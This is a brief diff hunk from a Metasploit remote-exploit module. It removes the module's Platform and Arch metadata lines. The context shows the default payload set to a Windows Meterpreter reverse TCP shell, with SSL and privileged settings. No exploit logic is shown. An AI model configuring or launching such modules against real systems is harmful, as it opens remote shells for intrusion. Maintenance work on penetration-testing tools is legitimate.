@@ -66,8 +66,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => true,
           'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
         },
-        'Platform' => ['windows'],
-        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
         'Privileged' => true,
         'Targets' => [
           [
